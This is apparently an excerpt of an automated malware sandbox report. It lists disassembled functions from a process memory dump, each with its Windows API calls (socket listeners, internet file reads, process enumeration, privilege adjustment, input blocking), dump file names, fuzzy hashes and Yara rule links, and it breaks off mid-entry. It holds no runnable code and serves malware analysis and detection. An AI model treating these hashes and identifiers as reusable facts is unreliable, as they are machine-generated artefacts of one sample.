                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003E65EF
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E65FE
                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 003E661A
                                                                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 003E6629
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E6643
                                                                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 003E6657
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279440585-0
                                                                                                                                                                      • Opcode ID: c3563a8b177edb543c847330d14ca85adf2dd47a623f6af3dd2e85ad325cd384
                                                                                                                                                                      • Instruction ID: e9bf3bd4f8c37f64a82e145021749ca63b33e64e7c101ce1f0368ad7b6d82eb8
                                                                                                                                                                      • Opcode Fuzzy Hash: c3563a8b177edb543c847330d14ca85adf2dd47a623f6af3dd2e85ad325cd384
                                                                                                                                                                      • Instruction Fuzzy Hash: A22191346002149FCB12AF24C886B7EB7BDEF45360F158269E95AEB3E1CB70AD05CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00371287, Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 003719FA
                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00371A4E
                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00371A61
                                                                                                                                                                        • Part of subcall function 00371290: DefDlgProcW.USER32(?,00000020,?), ref: 003712D8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3744519093-0
                                                                                                                                                                      • Opcode ID: 455e8b87244eed8c53777613ee63800cf1da8f16c63949cfd39884401ccd1ca1
                                                                                                                                                                      • Instruction ID: 05b2528211621bf7ae2006a06f406e0cc614eaa464812ed135c5ac707c8b3829
                                                                                                                                                                      • Opcode Fuzzy Hash: 455e8b87244eed8c53777613ee63800cf1da8f16c63949cfd39884401ccd1ca1
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AA1567310644CBADA3BAB2C4C44DBF659DDB47381F16C11AF50ADA592DB2CCD0192B6
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E6A5A, Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003E80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003E80CB
                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003E6AB1
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E6ADA
                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 003E6B13
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E6B20
                                                                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 003E6B34
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 99427753-0
                                                                                                                                                                      • Opcode ID: 772e61790895b20ddc7bc99558a6e7441cbfbf8b6106760f90358d4ed662fa8e
                                                                                                                                                                      • Instruction ID: ffe9d2c804e9c88a94e10d284a97e37b999dfebb0188a15b0e137a1947245a3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 772e61790895b20ddc7bc99558a6e7441cbfbf8b6106760f90358d4ed662fa8e
                                                                                                                                                                      • Instruction Fuzzy Hash: C7419675A40210AFEB22AF249C86F7E77A99F44760F04C159F919AF3D2DB749D008B91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F55FD, Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                      • Opcode ID: da9d2020c960f7727e5ed3cc72216acb6cec43e1e62fe8f06db6fb8ea070ece3
                                                                                                                                                                      • Instruction ID: e07beebef79a4057108425285bfec7888788b1c8323d58d4fbe110b9dd6cb53b
                                                                                                                                                                      • Opcode Fuzzy Hash: da9d2020c960f7727e5ed3cc72216acb6cec43e1e62fe8f06db6fb8ea070ece3
                                                                                                                                                                      • Instruction Fuzzy Hash: 951190313019156FE7231F26DC44B3ABBACEF85721F458029EB1ADB241CB349901CAA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EF121, Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 003EF151
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 003EF15F
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 003EF21F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 003EF22E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2576544623-0
                                                                                                                                                                      • Opcode ID: 4ed83149ddf0098a20d95a8c747906600c0b3e7b70265a7d67e98933f433df61
                                                                                                                                                                      • Instruction ID: dfa37b4e1da64d4e3f27e075925a66e22379905918da8c88a3e34cba2b1ca9d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ed83149ddf0098a20d95a8c747906600c0b3e7b70265a7d67e98933f433df61
                                                                                                                                                                      • Instruction Fuzzy Hash: C2518D715043509FD322EF20DC85E6BB7E8FF84710F50892DF5999B291EB74A904CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E25E2, Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 003E26D5
                                                                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003E270C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 599397726-0
                                                                                                                                                                      • Opcode ID: 9ae42f2598b4611f45697a5d09e83af5010d8ea5f9520955b0959dcc48809ee8
                                                                                                                                                                      • Instruction ID: e438a692efe60f208a1a11b37a31305be332b614a8800ac9c1c758d1ef6efefe
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ae42f2598b4611f45697a5d09e83af5010d8ea5f9520955b0959dcc48809ee8
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A413871500359BFEB22DE56CC85EBBB3BCEB40314F10426EFA01A61C1EAB19E41D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DB59E, Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003DB5AE
                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003DB608
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003DB655
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1682464887-0
                                                                                                                                                                      • Opcode ID: d7b44db18eb317b76e29d5ff456c1127922d7e44b16aae91044bdefec8682291
                                                                                                                                                                      • Instruction ID: e3cd299b36237592f56f252125f592bf5eb0f3a6812228ec83e2ae7f06e10d56
                                                                                                                                                                      • Opcode Fuzzy Hash: d7b44db18eb317b76e29d5ff456c1127922d7e44b16aae91044bdefec8682291
                                                                                                                                                                      • Instruction Fuzzy Hash: 46216D35A00118EFCB01EFA5D880EADBBB8FF88310F1581AAE905AB351DB31A915CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8CC3, Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00390FF6: std::exception::exception.LIBCMT ref: 0039102C
                                                                                                                                                                        • Part of subcall function 00390FF6: __CxxThrowException@8.LIBCMT ref: 00391041
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003C8D0D
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003C8D3A
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 003C8D47
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1922334811-0
                                                                                                                                                                      • Opcode ID: 72215523580280d3e107143ea3a69a60b4134101cc705315b4a601929315c8e7
                                                                                                                                                                      • Instruction ID: 8b79641dbb88925bb4675851bda8d21556f8869147979c5c899b7428a1bd4179
                                                                                                                                                                      • Opcode Fuzzy Hash: 72215523580280d3e107143ea3a69a60b4134101cc705315b4a601929315c8e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 89116AB1414209AFE729AF64DC89D6BB7BCFB44710B20852EF85696241EB30AD408B60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D4021, Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003D404B
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 003D4088
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003D4091
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 33631002-0
                                                                                                                                                                      • Opcode ID: 87d3c01070830f05debbd9fc438ddc104fa0fd913aaa2b1de3e994716367647e
                                                                                                                                                                      • Instruction ID: 70b67e0b58eee0397a5580ce92cabf1185a65f9462bea8d8f6f90d1b1707e565
                                                                                                                                                                      • Opcode Fuzzy Hash: 87d3c01070830f05debbd9fc438ddc104fa0fd913aaa2b1de3e994716367647e
                                                                                                                                                                      • Instruction Fuzzy Hash: 95117CB2D00228BFE7219BE8EC45FBFBBBCEB08710F000656BA04E7290D274590487A1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D4C03, Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003D4C2C
                                                                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003D4C43
                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 003D4C53
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                      • Opcode ID: 2c59346d0ea44e801a4201a7aa17daeb6c8250f88183d780d8266f5e0069ffbd
                                                                                                                                                                      • Instruction ID: 229274a1a1d4bcd70b2c5a59310539aed5b760f651c0c3c5c8cdbb1f221b3987
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c59346d0ea44e801a4201a7aa17daeb6c8250f88183d780d8266f5e0069ffbd
                                                                                                                                                                      • Instruction Fuzzy Hash: 18F0E776A51209BFDB04DFE49D89ABEBBBCEF08311F5044A9A901E2281E6756A448B50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D4696, Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,003AE7C1), ref: 003D46A6
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003D46B7
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003D46C7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 48322524-0
                                                                                                                                                                      • Opcode ID: ebaf91d360cd82bf974aaac55cfc2e8b11710776268b718ba91fa9dc406b2712
                                                                                                                                                                      • Instruction ID: 0d2389b451e71455a58acf933cb077eea912444fc49d35600c4a8b5f4ef9a9fe
                                                                                                                                                                      • Opcode Fuzzy Hash: ebaf91d360cd82bf974aaac55cfc2e8b11710776268b718ba91fa9dc406b2712
                                                                                                                                                                      • Instruction Fuzzy Hash: 92E0D8364104006F82116738FC4D4FA775C9E06335F100B17FD36C16F0E7B09950C595
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DC93C, Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003DC966
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003DC996
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                      • Opcode ID: 570c6b0850b04f8af1f46e5a92218d0117da77b734900308016ffbd72342778d
                                                                                                                                                                      • Instruction ID: 7f9cbb09548dcc49f1dfc651e328e12fccd68d905c460de435a207d60e4fcccd
                                                                                                                                                                      • Opcode Fuzzy Hash: 570c6b0850b04f8af1f46e5a92218d0117da77b734900308016ffbd72342778d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A1152766106009FD711DF29D845A2AF7E9EF85324F00861EF9A9DB391DB34AC05CB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DA2D5, Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003E977D,?,003FFB84,?), ref: 003DA302
                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003E977D,?,003FFB84,?), ref: 003DA314
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                      • Opcode ID: 1414ec192b527dc15ce2ea28a05adfd1e81e2117b92cf0a2000e9c7c506eb8da
                                                                                                                                                                      • Instruction ID: 7686585bc14790bf74a9c0d976a82d330f444dce18f245c41800b9d8d038dd1b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1414ec192b527dc15ce2ea28a05adfd1e81e2117b92cf0a2000e9c7c506eb8da
                                                                                                                                                                      • Instruction Fuzzy Hash: 66F0823954422DBBDB229FA4DC48FEA776DFF09761F008166F908D6281D7309950CBA1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8713, Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003C8851), ref: 003C8728
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,003C8851), ref: 003C873A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                      • Opcode ID: bad07d7badf11d5a74f25ded9dc5d6f09b9935105ef0509c7b6a7ef7fdb2c52f
                                                                                                                                                                      • Instruction ID: ba4402f2f37cfec706368e6c0ffd945e30af7f4403f58b2c7283524f17d780d3
                                                                                                                                                                      • Opcode Fuzzy Hash: bad07d7badf11d5a74f25ded9dc5d6f09b9935105ef0509c7b6a7ef7fdb2c52f
                                                                                                                                                                      • Instruction Fuzzy Hash: 19E0BF76010511EEEB272B60EC05D7777ADEF04350B14853DB85684570DB625C90DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E41FD, Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 003E4218
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                      • Opcode ID: 8390f11ef5fdaa6e664e4d587a19f8c634ed64527c855ac7a4aad1cf5ee2b00c
                                                                                                                                                                      • Instruction ID: d2d58ab5bd3ea878cda75a9c9b4ff6c7a74a5747fa832f7706f14e79875f91da
                                                                                                                                                                      • Opcode Fuzzy Hash: 8390f11ef5fdaa6e664e4d587a19f8c634ed64527c855ac7a4aad1cf5ee2b00c
                                                                                                                                                                      • Instruction Fuzzy Hash: FAE04F312402149FC721EF5AD844A9AF7ECAF98760F01C526FD49DB352DA74E841CBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D4EF5, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
